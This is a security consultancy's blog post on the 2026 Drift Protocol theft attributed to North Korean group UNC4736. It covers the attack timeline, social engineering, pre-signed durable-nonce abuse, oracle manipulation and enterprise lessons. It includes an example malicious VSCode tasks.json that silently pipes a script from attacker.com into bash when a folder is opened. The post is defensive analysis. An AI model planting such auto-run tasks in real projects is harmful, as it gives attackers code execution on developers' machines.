How North Korea Stole $285M from Drift Protocol: The VSCode Supply Chain Technique Your Engineering Team Should Know About | Lorikeet Security Skip to main content
Back to Blog
Security Incidents

How North Korea Stole $285M from Drift Protocol: The VSCode Supply Chain Technique Your Engineering Team Should Know About

Lorikeet Security · April 6, 2026 · 12 min read

On April 1, 2026, the largest hack of the year executed flawlessly. In twelve minutes, 31 coordinated transactions drained $285 million in USDC and JLP from Drift Protocol — the largest decentralized perpetual futures exchange on Solana. The attackers had been inside for six months.

Attribution to UNC4736, a North Korean state-sponsored financial theft group, came within 48 hours. This is the same unit that breached 3CX in 2023 via a supply chain attack on a trading application and stole $53M from Radiant Capital in October 2024. Their sophistication has not plateaued.

What makes this incident worth your attention — even if you have no exposure to DeFi or Solana — is the toolkit. The techniques used in this attack are not crypto-specific. The IDE supply chain vector, the long-con social engineering playbook, and the pre-signed authorization abuse all translate directly to enterprise environments. If your engineering team opens repositories from external contributors, your organization is in the same threat model.

$285M
Drained in 12 minutes
6 mo.
Pre-attack access period
31
Coordinated transactions
UNC4736
DPRK threat actor

The Six-Month Attack Timeline

This was not an opportunistic exploit. It was a patient, multi-phase operation that required sustained presence, parallel infrastructure construction, and precise timing across multiple attack vectors simultaneously.

Fall 2025
Initial approach. DPRK operatives, using non-North Korean intermediaries, approach Drift contributors at crypto conferences posing as a quantitative trading firm seeking integration partnerships.
Dec 2025
Operational presence established. The "trading firm" deposits over $1M into Drift and onboards as a legitimate Ecosystem Vault participant — building credibility and ensuring continued access to the protocol team.
Dec 2025 – Feb 2026
Developer compromise. At least one Drift contributor opens a malicious VSCode project shared by the attackers. The project's tasks.json silently executes a payload on folder open. Sustained Telegram communication with contributors continues throughout this period — "detailed product questions" maintaining access and trust.
Mar 11, 2026
Funding infrastructure. Attackers withdraw 10 ETH from Tornado Cash to fund the fake token infrastructure needed for the oracle manipulation phase.
Mar 12, 2026
Fake collateral token deployed. CarbonVote Token (CVT) minted — 750 million units. Liquidity seeded on Raydium DEX. Wash trading begins to manufacture a stable ~$1 price history, which Drift's price oracle will later treat as legitimate collateral.
Mar 27, 2026
Governance destroyed. A zero-timelock Security Council migration is pushed through — eliminating the time-delay mechanism that would have allowed the community to detect and block malicious upgrades. This is the point of no return.
Apr 1, 2026
Execution. CVT listed as collateral, withdrawal limits raised. 31 withdrawal transactions drain ~$285M in USDC and JLP in 12 minutes. Stolen funds bridged to Ethereum within hours. Telegram logs and malicious software deleted.

The Five Attack Vectors — And Their Enterprise Equivalents

What makes this attack exceptional is the layered redundancy. Any single defensive control stopping one vector would not have prevented the breach — the attackers had multiple independent paths to the same outcome.

1. IDE Supply Chain: The VSCode tasks.json Technique

This is the vector that should concern every engineering organization immediately. The attackers shared a malicious VSCode project with Drift contributors. Inside that project was a weaponized tasks.json file using the "runOn": "folderOpen" configuration option.

// .vscode/tasks.json — what a malicious project looks like { "version": "2.0.0", "tasks": [ { "label": "Setup Development Environment", "type": "shell", "command": "curl -s https://attacker.com/payload.sh | bash", "runOptions": { "runOn": "folderOpen" // ← executes silently on repo open }, "presentation": { "reveal": "silent", // ← no visible terminal window "panel": "dedicated" } } ] }

The moment a developer opens the repository in VSCode or Cursor, the task executes. No user interaction, no obvious sign, no security warning in older versions. The same technique is the backbone of DPRK's "Contagious Interview" campaign that has been running since 2023 — where operatives pose as technical recruiters and ask candidates to clone and "review" a repository as part of a job interview.

The enterprise risk: Your developers open external repositories regularly — open source contributions, vendor integrations, interview take-home projects, freelancer code reviews. Any of these can carry this payload. It does not require the attacker to compromise a package registry or an upstream dependency. They just need to get someone to open the project folder.

Microsoft patched the unattended task execution behavior in VSCode 1.109 and 1.110. If your organization is running older versions — or if developers are using Cursor, which had the same vulnerability — this attack vector remains open.

Check Your VSCode Version Now Run code --version in a terminal. If the version is below 1.109, update immediately. Audit all developers on your team. The fix specifically addresses the automatic execution of tasks on folder open without user confirmation — a behavior that should never have existed as a default.

2. TestFlight Supply Chain: The Trojanized Mobile App

A second contributor was compromised via a wallet application distributed through Apple's TestFlight beta testing platform. The app was either directly trojanized or replaced a legitimate app in the contributor's trust chain. This vector is harder to defend against — TestFlight applications bypass the App Store review process by design, and malicious applications in beta distribution are a known but underappreciated risk.

The enterprise risk: Engineering teams that use mobile applications for internal tools, MFA, or production access — especially beta-distributed applications — carry this exposure. This includes hardware wallet companion apps, internal ops tools, and infrastructure management apps distributed via MDM or beta testing programs.

3. Durable Nonce Pre-Signing: The Pre-Authorized Credential Trap

This is the financial mechanism of the heist, and it has a clear enterprise analogue. Solana transactions normally include a blockhash that expires in approximately two minutes. Durable nonces replace this with a fixed value stored on-chain, keeping a transaction valid indefinitely.

Attackers socially engineered members of Drift's Security Council — the 2-of-5 multisig body responsible for governance — into pre-signing what appeared to be routine governance transactions. These were actually durable nonce transactions. Weeks later, the attackers submitted those pre-signed authorizations in a completely different operational context, bypassing the multisig protection entirely.

The enterprise equivalent: Pre-approved change tickets, long-lived OAuth tokens, persistent API keys scoped to privileged operations, and "break glass" credentials that exist in a pre-authorized state waiting to be used. Social engineering an approver into pre-approving a change request is exactly the same attack pattern — just in a different domain. The 2-of-5 threshold also highlights a critical governance misconfiguration: a threshold that low, on a treasury controlling hundreds of millions, should have been 3-of-5 at minimum.

4. Oracle Manipulation: Manufacturing Trusted Data

The CarbonVote Token (CVT) operation is a textbook data integrity attack. Attackers minted 750 million CVT units, seeded minimal real liquidity, and used wash trading to manufacture a consistent ~$1 price signal over several weeks. Drift's price oracle — trusting the on-chain price data — treated CVT as legitimate collateral worth hundreds of millions of dollars.

The enterprise equivalent: Any system that trusts an external data feed without independent verification is vulnerable to this attack pattern. This includes: security tools that trust log aggregators that can be manipulated, SIEM rules that depend on external threat intel feeds, and configuration management systems that pull from sources an attacker has compromised. The attacker does not need to compromise the system directly — they only need to corrupt the data the system trusts.

5. Governance Destruction: Eliminating the Last Defense

The March 27 zero-timelock Security Council migration was not part of the financial theft itself — it was a preparatory step to eliminate the protocol's last line of defense. Drift's governance model originally included time delays on major parameter changes, giving the community time to detect and block malicious upgrades. By migrating the Security Council with a zero timelock, the attackers removed this safeguard twelve days before the final execution.

The enterprise equivalent: This mirrors the pattern of privilege escalation followed by defense removal that pentesters find in enterprise environments constantly. Compromised service accounts are used to modify SIEM alert thresholds, disable DLP policies, or approve changes that reduce detection coverage — all in preparation for the final payload. The most dangerous attacks are not ones that try to evade defenses. They are ones that successfully remove defenses before executing.


Understanding the DPRK Long-Con Playbook

UNC4736, also tracked as AppleJeus, Citrine Sleet, and Golden Chollima, is one of the most financially focused threat actors in the world. Unlike most nation-state groups whose primary objectives are espionage and data theft, DPRK's cyber operations have a direct revenue function — funding the North Korean state. Estimates put DPRK's cumulative crypto theft at over $3 billion since 2017.

Threat Actor Profile — UNC4736
Also known as: AppleJeus, Citrine Sleet, Golden Chollima, Gleaming Pisces
State sponsor: Democratic People's Republic of Korea (DPRK), Reconnaissance General Bureau
Primary objective: Financial theft to fund the DPRK state
Notable prior operations: 3CX supply chain breach (2023), Radiant Capital hack — $53M (Oct 2024), multiple exchange compromises totaling $3B+ since 2017
Signature TTPs: Contagious Interview (developer supply chain), fake trading firm personas, watering hole attacks on crypto communities, IDE and package manager supply chain abuse

The six-month timeline in the Drift attack is not unusual for DPRK operations. They are willing to invest months of sustained access — conference attendance, Telegram conversations, product testing, real capital deployment — to build the trust and operational position needed for a single high-value extraction. This patience is the defining characteristic that separates their operations from opportunistic criminal groups.

The use of non-North Korean intermediaries at the initial approach phase is also a consistent technique. It bypasses the geographic and behavioral anomaly detection that might flag a direct approach from a DPRK-associated identity. The real operatives enter later, after the relationship is already established.


What Your Engineering Team Needs to Do This Week

The Drift hack is a case study, not just a news story. If you run an engineering team that handles production infrastructure, customer data, or privileged access systems, these are not hypothetical risks.


The Bigger Picture: DPRK Is Not Slowing Down

The Drift Protocol hack represents a continued evolution of DPRK's operational capability. Each major operation adds sophistication: the 3CX breach introduced supply chain compromise of a legitimate business application. The Radiant Capital hack refined the social engineering of multisig keyholders. The Drift operation combined developer tooling supply chain, governance manipulation, fake financial infrastructure, and pre-signed authorization abuse into a single coordinated campaign.

United Nations Security Council reports have documented DPRK stealing over $1.5 billion in cryptocurrency in 2024 alone. The revenue model works. The operational tempo is increasing. And the target list is expanding — DPRK is not exclusively targeting crypto. Their Contagious Interview campaign has been observed targeting developers at fintech companies, defense contractors, and enterprise software firms.

The $285M from Drift will fund North Korea's weapons program. The techniques they used to get it will be used again — possibly against a traditional enterprise, a startup with a valuable acquisition target, or a developer at your company who receives a LinkedIn message from a convincing recruiter offering a compelling technical challenge.

The Contagious Interview Campaign Is Ongoing DPRK's developer supply chain campaign is not a one-time tactic — it has been running continuously since at least 2023 and is accelerating. Researchers at SentinelOne, Mandiant, and CrowdStrike have documented hundreds of developer targets across the US, Europe, Australia, and Asia. The fake personas are convincing, the repositories are well-constructed, and the social engineering is patient and personalized. Brief your engineering team now.

Is Your Engineering Team in DPRK's Target Profile?

If your developers handle production infrastructure, privileged access systems, or customer data — they are potential Contagious Interview targets. Our security assessments cover developer tooling exposure, supply chain attack surface, and the social engineering controls that nation-state actors probe first.

Talk to Our Team
-- views
Link copied!
Lorikeet Security

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.

Lory waving

Hi, I'm Lory! Need help finding the right service? Click to chat!